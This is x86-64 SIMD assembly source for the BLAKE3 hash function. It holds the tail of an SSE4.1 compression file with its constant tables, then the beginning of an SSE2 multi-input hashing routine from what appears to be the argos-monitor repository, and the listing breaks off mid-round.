jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
movups xmmword ptr [rdi], xmm0
movups xmmword ptr [rdi+0x10], xmm1
ret
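// Same compression core, but writes the full 64-byte extended output to
// r9 (out) instead of updating the CV in place.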
.p2align 6
blake3_compress_xof_sse41:
_blake3_compress_xof_sse41:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
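// XOF finalization: the low half is the usual feed-forward, the high half
// is the post-round rows xored with the original input CV.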
movdqu xmm4, xmmword ptr [rdi]
movdqu xmm5, xmmword ptr [rdi+0x10]
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm2, xmm4
pxor xmm3, xmm5
movups xmmword ptr [r9], xmm0
movups xmmword ptr [r9+0x10], xmm1
movups xmmword ptr [r9+0x20], xmm2
movups xmmword ptr [r9+0x30], xmm3
ret
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
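// Constants: the first four IV words form row 2 of the compression state;
// the remaining tables serve the multi-input hashing path above.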
.p2align 6
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85
.long 0x3C6EF372, 0xA54FF53A
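# pshufb masks implementing a 32-bit right-rotation of each lane by 16 and
# 8 bits respectively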
ROT16:
.byte 2, 3, 0, 1, 6, 7, 4, 5, 10, 11, 8, 9, 14, 15, 12, 13
ROT8:
.byte 1, 2, 3, 0, 5, 6, 7, 4, 9, 10, 11, 8, 13, 14, 15, 12
ADD0:
.long 0, 1, 2, 3
ADD1:
.long 4, 4, 4, 4
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 64, 64, 64, 64
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
|
mit-enclaves/argos-monitor | 68,858 | C/libraries/sdktyche/loader/blake3_sse2_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global blake3_hash_many_sse2
.global _blake3_hash_many_sse2
.global blake3_compress_in_place_sse2
.global _blake3_compress_in_place_sse2
.global blake3_compress_xof_sse2
.global _blake3_compress_xof_sse2
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_sse2:
blake3_hash_many_sse2:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 360
and rsp, 0xFFFFFFFFFFFFFFC0
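# round rsp down to a 64-byte boundary so the aligned movdqa spills into
# the scratch area reserved above stay 16-byte aligned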
neg r9d
movd xmm0, r9d
pshufd xmm0, xmm0, 0x00
movdqa xmmword ptr [rsp+0x130], xmm0
movdqa xmm1, xmm0
pand xmm1, xmmword ptr [ADD0+rip]
pand xmm0, xmmword ptr [ADD1+rip]
movdqa xmmword ptr [rsp+0x150], xmm0
movd xmm0, r8d
pshufd xmm0, xmm0, 0x00
paddd xmm0, xmm1
movdqa xmmword ptr [rsp+0x110], xmm0
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm1, xmm0
shr r8, 32
movd xmm2, r8d
pshufd xmm2, xmm2, 0x00
psubd xmm2, xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
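# [rsp+0x110] and [rsp+0x120] now hold the low and high 32-bit halves of
# the four per-input 64-bit chunk counters (counter+0..3, or four equal
# copies when the increment flag is false); the pcmpgtd above, with
# CMP_MSB_MASK flipping the sign bits, emulates an unsigned compare to
# detect carries into the high half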
mov rbx, qword ptr [rbp+0x50]
mov r15, rdx
shl r15, 6
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
cmp rsi, 4
jc 3f
2:
movdqu xmm3, xmmword ptr [rcx]
pshufd xmm0, xmm3, 0x00
pshufd xmm1, xmm3, 0x55
pshufd xmm2, xmm3, 0xAA
pshufd xmm3, xmm3, 0xFF
movdqu xmm7, xmmword ptr [rcx+0x10]
pshufd xmm4, xmm7, 0x00
pshufd xmm5, xmm7, 0x55
pshufd xmm6, xmm7, 0xAA
pshufd xmm7, xmm7, 0xFF
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
9:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movdqu xmm8, xmmword ptr [r8+rdx-0x40]
movdqu xmm9, xmmword ptr [r9+rdx-0x40]
movdqu xmm10, xmmword ptr [r10+rdx-0x40]
movdqu xmm11, xmmword ptr [r11+rdx-0x40]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp], xmm8
movdqa xmmword ptr [rsp+0x10], xmm9
movdqa xmmword ptr [rsp+0x20], xmm12
movdqa xmmword ptr [rsp+0x30], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x30]
movdqu xmm9, xmmword ptr [r9+rdx-0x30]
movdqu xmm10, xmmword ptr [r10+rdx-0x30]
movdqu xmm11, xmmword ptr [r11+rdx-0x30]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x40], xmm8
movdqa xmmword ptr [rsp+0x50], xmm9
movdqa xmmword ptr [rsp+0x60], xmm12
movdqa xmmword ptr [rsp+0x70], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x20]
movdqu xmm9, xmmword ptr [r9+rdx-0x20]
movdqu xmm10, xmmword ptr [r10+rdx-0x20]
movdqu xmm11, xmmword ptr [r11+rdx-0x20]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x80], xmm8
movdqa xmmword ptr [rsp+0x90], xmm9
movdqa xmmword ptr [rsp+0xA0], xmm12
movdqa xmmword ptr [rsp+0xB0], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x10]
movdqu xmm9, xmmword ptr [r9+rdx-0x10]
movdqu xmm10, xmmword ptr [r10+rdx-0x10]
movdqu xmm11, xmmword ptr [r11+rdx-0x10]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0xC0], xmm8
movdqa xmmword ptr [rsp+0xD0], xmm9
movdqa xmmword ptr [rsp+0xE0], xmm12
movdqa xmmword ptr [rsp+0xF0], xmm13
movdqa xmm9, xmmword ptr [BLAKE3_IV_1+rip]
movdqa xmm10, xmmword ptr [BLAKE3_IV_2+rip]
movdqa xmm11, xmmword ptr [BLAKE3_IV_3+rip]
movdqa xmm12, xmmword ptr [rsp+0x110]
movdqa xmm13, xmmword ptr [rsp+0x120]
movdqa xmm14, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
movd xmm15, eax
pshufd xmm15, xmm15, 0x00
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [BLAKE3_IV_0+rip]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x80]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x70]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xB0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x50]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
